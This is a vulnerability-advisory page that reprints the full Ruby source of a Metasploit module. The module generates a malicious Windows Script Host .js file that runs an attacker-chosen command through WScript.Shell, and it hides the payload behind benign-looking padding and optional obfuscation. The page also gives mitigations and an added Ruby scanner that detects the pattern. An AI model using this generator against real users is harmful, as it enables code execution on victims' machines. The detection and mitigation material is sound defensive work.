Malicious Windows Script Host JScript (js) File

Vulnerability Information

Vulnerability name: Malicious Windows Script Host JScript (.js) File

Vulnerability type: Command execution (user-executed malicious file)

Severity: High

Description: This module creates a malicious Windows Script Host (WSH) JScript (.js) file that executes an attacker-chosen command on the target system when the file is opened. Windows Script Host is the scripting runtime shipped with Windows (wscript.exe and cscript.exe), widely used for automation; by default a double-clicked .js file is handed to wscript.exe. Exploitation does require user interaction: the victim has to open the .js file (the module references ATT&CK T1204.002, User Execution: Malicious File), after which no further interaction is needed.

Technically this is not a flaw in the JScript engine but intended functionality: WSH exposes COM automation to scripts, so a JScript file can instantiate WScript.Shell through ActiveXObject and call its Run method with an arbitrary command line. The module wraps a generated payload command in exactly that two-statement script, optionally preceded by throwaway variable declarations and blank lines and passed through JSObfu, to obtain code execution on the host where the file is opened.

The impact is serious, but it should be stated precisely: the command runs with the privileges of the user who opened the file (the module sets 'Privileged' => false), not remotely and not without authentication. The attacker still needs a delivery channel (mail attachment, download, removable media) and a user who runs the file. Because WSH has shipped with every Windows version since Windows 98, any host that still lets .js files open in wscript.exe is exposed. Common mitigations: set HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings\Enabled to 0 to disable WSH, change the default handler for .js and .jse files to Notepad, and block wscript.exe and cscript.exe for standard users with AppLocker or WDAC script rules.

Vendor: Microsoft

Product: Windows Script Host

Affected versions: Microsoft Windows 98 or newer

Source: https://github.com/rapid7/metasploit-framework/blob/12340ef6b5d418c39db9f8c6eeb4a96b30c0cc80/modules%2Fexploits%2Fwindows%2Ffileformat%2Fwindows_script_host_jscript.rb

Type: rapid7/metasploit-framework:github commit

PoC Details


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::JSObfu

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Malicious Windows Script Host JScript (.js) File',
        'Description' => %q{
          This module creates a Windows Script Host (WSH) JScript (.js) file.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'bcoles'
        ],
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
        ],
        'Arch' => [ARCH_CMD],
        'Platform' => 'win',
        'Payload' => {
          'Space' => 8_000, # 8190 maximum command length, minus some space for "cmd.exe /c " and escaping
          'BadChars' => "\x00",
          'DisableNops' => true
        },
        'Targets' => [
          [
            'Microsoft Windows 98 or newer', {}
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '1998-06-25', # Windows 98 release date
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'DisablePayloadHandler' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [SCREEN_EFFECTS]
        }
      )
    )

    register_options([
      OptString.new('FILENAME', [true, 'The JScript file name.', 'msf.js']),
      OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])
    ])

    # Padding options: both exist only to push the payload away from the top of
    # the file so a casual look (or a naive scanner) sees harmless code first.
    register_advanced_options([
      OptBool.new('PrependBenignCode', [false, 'Prepend several lines of benign code at the start of the file.', true]),
      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the malicious JScript.', 100]),
    ])
  end

  def generate_jscript(command_string, prepend_benign_code: false, prepend_new_lines: 0, obfuscate: false)
    js = ''

    # TODO: This could be improved by generating more realistic looking
    # benign code with functions and flow control
    if prepend_benign_code
      rand(5..10).times do
        js << "var #{rand_text_alpha(6..16)}=\"#{rand_text_alphanumeric(6..16)}\";\r\n"
      end
    end

    js << "\r\n" * prepend_new_lines

    # Escape backslashes and double quotes so the command survives inside a
    # JScript string literal.
    escaped_payload = command_string.gsub('\\', '\\\\\\').gsub('"', '\\"')

    # If the payload contains " & " we presume it is a command string.
    #
    # TODO: Change this once Metasploit is able to inform a module that
    # the specified ARCH_CMD payload is a string of commands
    # (not a single command).
    if escaped_payload.include?(' & ')
      cmd = "cmd.exe /c #{escaped_payload}"
    else
      cmd = escaped_payload
    end

    shell_var = rand_text_alpha(6..16)
    js_payload = "var #{shell_var} = new ActiveXObject(\"WScript.Shell\");"
    js_payload << "#{shell_var}.Run(\"#{cmd}\");"

    if obfuscate
      js_obfu = Rex::Exploitation::JSObfu.new(js_payload)
      obfuscated_payload = js_obfu.obfuscate(memory_sensitive: false).to_s
      # WSH JScript execution context does not support 'window' object
      obfuscated_payload = obfuscated_payload.gsub('window[', 'String[')
      js << obfuscated_payload
    else
      js << js_payload
    end

    js
  end

  def exploit
    js = generate_jscript(
      payload.encoded,
      prepend_benign_code: datastore['PrependBenignCode'],
      prepend_new_lines: datastore['PrependNewLines'],
      obfuscate: datastore['OBFUSCATE']
    )
    file_create(js)
  end
end
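As an added example, not code from the Metasploit module or from this page: a small Ruby triage scanner for .js files that looks for the artifact pattern the module above produces (a WScript.Shell instantiation followed by a .Run call, optionally preceded by the PrependBenignCode / PrependNewLines padding). It goes slightly beyond the module by also recognising the WScript.CreateObject form, which the module does not emit. Every sample script below is constructed for the demo. The literal-string rules will not match once OBFUSCATE has rewritten the strings, so the obfuscated case is only flagged through the padding heuristic plus the "String[" lookup that the module substitutes for JSObfu's "window["; the obfuscated sample is a stand-in, not real JSObfu output.

```ruby
# Added example: static triage of WSH JScript files for the WScript.Shell.Run
# pattern. Not part of the Metasploit module; samples are constructed.

# Indicators keyed by name. The ActiveXObject/.Run/"cmd.exe /c" markers come
# from generate_jscript above; WScript.CreateObject is an equivalent WSH form
# the module does not use; "String[" is the module's own replacement for
# JSObfu's "window[" lookups.
INDICATORS = {
  activex_wscript_shell: /new\s+ActiveXObject\s*\(\s*["']WScript\.Shell["']\s*\)/i,
  createobject_wscript_shell: /WScript\.CreateObject\s*\(\s*["']WScript\.Shell["']\s*\)/i,
  run_or_exec: /\.\s*(Run|Exec)\s*\(/,
  cmd_exe_c: /cmd\.exe\s+\/c/i,
  string_index_lookup: /\bString\[/
}.freeze

# A throwaway assignment of the shape PrependBenignCode emits: var x="...";
BENIGN_VAR_LINE = /\A\s*var\s+[A-Za-z_$][\w$]*\s*=\s*"[^"]*"\s*;\s*\z/

# Count leading benign-looking var lines, then leading blank lines, and report
# the index of the first line that is neither (where the real code starts).
def leading_padding(source)
  lines = source.split(/\r?\n/, -1)
  benign = 0
  blank = 0
  idx = 0
  while idx < lines.size && lines[idx] =~ BENIGN_VAR_LINE
    benign += 1
    idx += 1
  end
  while idx < lines.size && lines[idx].strip.empty?
    blank += 1
    idx += 1
  end
  { benign_vars: benign, blank_lines: blank, code_starts_at: idx }
end

def scan_jscript(source)
  hits = INDICATORS.select { |_, re| source.match?(re) }.keys
  padding = leading_padding(source)
  # Thresholds are assumptions for the demo; the module defaults are 5..10
  # benign lines and 100 blank lines, so these catch the defaults with margin.
  padded = padding[:blank_lines] >= 20 || padding[:benign_vars] >= 5
  shell = hits.include?(:activex_wscript_shell) || hits.include?(:createobject_wscript_shell)
  verdict =
    if shell && hits.include?(:run_or_exec) then :malicious
    elsif hits.include?(:string_index_lookup) && padded then :suspicious_obfuscated
    elsif shell || padded then :suspicious
    else :clean
    end
  { verdict: verdict, indicators: hits, padding: padding }
end

# ---- constructed samples -------------------------------------------------
# Plain output with a multi-command payload (" & " triggers the cmd.exe /c wrap).
SAMPLE_PLAIN = <<~'JS'
  var zjqkLpQ = new ActiveXObject("WScript.Shell");zjqkLpQ.Run("cmd.exe /c whoami > %TEMP%\\o.txt & exit");
JS

# Default-style padding: 7 benign vars, 100 blank lines, then the payload.
BENIGN_LINES = Array.new(7) { |i| "var pad#{i}=\"junk#{i}\";" }
PAYLOAD_LINE = 'var kQzRtw = new ActiveXObject("WScript.Shell");kQzRtw.Run("calc.exe");'
SAMPLE_PADDED = BENIGN_LINES.map { |l| l + "\r\n" }.join + ("\r\n" * 100) + PAYLOAD_LINE

# Stand-in for obfuscated output: no literal "WScript.Shell", but the String[...]
# lookup and the same padding survive.
OBFU_LINE = 'var w = String["fromCharCode"](87,83,99,114,105,112,116);var s = this[w + "cript"];'
SAMPLE_OBFU = BENIGN_LINES.map { |l| l + "\r\n" }.join + ("\r\n" * 100) + OBFU_LINE

# Benign automation script: uses ActiveXObject but not WScript.Shell.Run.
SAMPLE_CLEAN = <<~'JS'
  var fso = new ActiveXObject("Scripting.FileSystemObject");
  WScript.Echo(fso.GetFolder(".").Path);
JS

if __FILE__ == $PROGRAM_NAME
  { plain: SAMPLE_PLAIN, padded: SAMPLE_PADDED, obfuscated: SAMPLE_OBFU, clean: SAMPLE_CLEAN }.each do |name, src|
    r = scan_jscript(src)
    puts "#{name}: #{r[:verdict]} indicators=#{r[:indicators].inspect} padding=#{r[:padding].inspect}"
  end
end
```

Run it with `ruby wsh_js_triage.rb` (any file name works). The padding counter is the part worth keeping even if the string rules are tuned away: a script whose first executable statement sits below a run of throwaway string assignments and a hundred blank lines is unusual for hand-written automation, and that shape is independent of what JSObfu does to the payload.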



Malicious Windows Script Host JScript (js) File
http://example.com/2025/07/28/github_3305986036/
Author
lianccc
Published
July 28, 2025
License